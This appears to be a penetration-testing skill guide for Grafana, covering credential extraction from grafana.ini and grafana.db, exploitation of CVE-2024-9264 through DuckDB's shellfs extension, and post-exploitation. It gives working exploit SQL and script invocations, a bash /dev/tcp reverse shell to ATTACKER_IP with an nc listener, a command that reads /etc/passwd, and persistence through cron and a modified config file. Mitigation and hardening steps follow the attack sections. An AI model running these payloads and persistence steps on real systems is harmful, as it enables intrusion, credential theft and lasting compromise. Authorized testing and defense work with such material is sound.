Grafana Pentesting Skill

A comprehensive guide for security assessment of Grafana instances, including configuration analysis, credential discovery, and CVE-2024-9264 exploitation.

⚠️ Authorization Required

Only use these techniques on systems you own or have explicit written authorization to test. Unauthorized access is illegal.

Quick Start

# Check if target is vulnerable to CVE-2024-9264
python3 scripts/check_grafana_cve.py -u <user> -p <pass> http://grafana.target

# Execute command if vulnerable
python3 scripts/exploit_cve_2024_9264.py -u <user> -p <pass> -c "id" http://grafana.target

1. Configuration File Analysis

Sensitive Information Locations

Check these files for exposed credentials and configuration:

/etc/grafana/grafana.ini

/var/lib/grafana/grafana.db

/etc/grafana/provisioning/

Extract Credentials from Config

# Read main config file
cat /etc/grafana/grafana.ini | grep -E "(admin_user|admin_password|password)"

# Query SQLite database for data source credentials
sqlite3 /var/lib/grafana/grafana.db "SELECT user, password, database FROM data_source;"

# Check for API keys in database
sqlite3 /var/lib/grafana/grafana.db "SELECT * FROM api_key;"

2. CVE-2024-9264 SQL Expressions RCE/LFI

Vulnerability Overview

Grafana's experimental SQL Expressions feature (enabled via

expressions.enabled = true

Impact:

• Code execution as Grafana OS user (often

  grafana

  , sometimes

  root

  in containers)
• Local file read (LFI) capabilities
• Works with VIEWER role or higher

Prerequisites Check

Before attempting exploitation, verify:

1. SQL Expressions enabled:

   curl -u <user>:<pass> http://grafana.target/api/admin/settings | jq '.expressions.enabled'
   

2. DuckDB binary present on server:

   # This check happens during exploitation attempt
   # If duckdb is not in PATH, exploit will fail
   

3. Authentication credentials:

   • Any user with VIEWER role or higher
   • Admin credentials provide more options

Manual Exploitation

Step 1: Install and Load Shellfs Extension

Execute this SQL query in Grafana's SQL Expressions interface:

SELECT 1; INSTALL shellfs FROM community; LOAD shellfs;
SELECT * FROM read_csv('CMD >/tmp/grafana_cmd_output 2>&1 |');

Replace

CMD

Step 2: Read Command Output

SELECT content FROM read_blob('/tmp/grafana_cmd_output');

Reverse Shell Payload

# Command to embed in the SQL query
bash -c "bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1"

# Listener on attacker machine
nc -lnvp 443

Automated Exploitation

Use the provided script for reliable exploitation:

# Check execution context and privileges
python3 scripts/exploit_cve_2024_9264.py -u <USER> -p <PASS> -c id http://grafana.target

# Launch reverse shell
python3 scripts/exploit_cve_2024_9264.py -u <USER> -p <PASS> \
  -c 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1"' \
  http://grafana.target

# Read arbitrary file (LFI)
python3 scripts/exploit_cve_2024_9264.py -u <USER> -p <PASS> \
  -c 'cat /etc/passwd' \
  http://grafana.target

Output interpretation:

• uid=0(root)

  indicates Grafana runs as root (common in containers)

• uid=471(grafana)

  indicates standard Grafana user

3. Enumeration and Discovery

Check Installed Plugins

# Via API
curl -u <user>:<pass> http://grafana.target/api/plugins

# Via UI: Admin → Plugins

Enumerate Data Sources

curl -u <user>:<pass> http://grafana.target/api/datasources

Check for API Keys

# Admin only
curl -u <admin>:<pass> http://grafana.target/api/admin/ldap

Invite Users (if admin)

# POST to /api/admin/users with user data
# Or use UI: Admin → Users → Invite User

4. Post-Exploitation

Privilege Escalation Checks

If you gain shell access:

# Check current user and groups
id

# Check for sudo privileges
sudo -l

# Check for other services running as root
ps aux | grep root

# Check for cron jobs
cat /etc/crontab
ls -la /etc/cron.*

Persistence Options

# Add reverse shell to Grafana startup (if you have write access)
echo 'YOUR_PAYLOAD' >> /etc/grafana/grafana.ini

# Create cron job
echo '* * * * * /path/to/payload' | crontab -

5. Mitigation and Remediation

For CVE-2024-9264

1. Disable SQL Expressions:

   # In /etc/grafana/grafana.ini
   [expressions]
   enabled = false
   

2. Update Grafana:

   • Upgrade to patched version (check Grafana security advisories)

3. Remove DuckDB:

   # If not needed for other purposes
   apt remove duckdb
   

4. Restrict User Permissions:

   • Use principle of least privilege
   • Avoid giving VIEWER role to untrusted users

General Hardening

1. Secure Configuration Files:

   chmod 600 /etc/grafana/grafana.ini
   chown grafana:grafana /etc/grafana/grafana.ini
   

2. Use Strong Authentication:

   • Enable LDAP/SSO
   • Use strong passwords
   • Enable 2FA if available

3. Network Segmentation:

   • Restrict access to Grafana
   • Use firewall rules
   • Consider reverse proxy with authentication

6. Testing Checklist

• Check

  /etc/grafana/grafana.ini

  for credentials
• Query SQLite database for data source credentials
• Verify SQL Expressions status via API
• Test CVE-2024-9264 with automated script
• Enumerate installed plugins
• Check for exposed API keys
• Attempt privilege escalation if shell access gained
• Document findings and remediation steps

References

• Grafana Advisory – CVE-2024-9264
• DuckDB shellfs Extension
• nollium/CVE-2024-9264 PoC
• cfreal/ten Framework

Notes

• This skill is designed for authorized security assessments only
• Always obtain written authorization before testing
• Document all findings and share with system owners
• Follow responsible disclosure practices for vulnerabilities found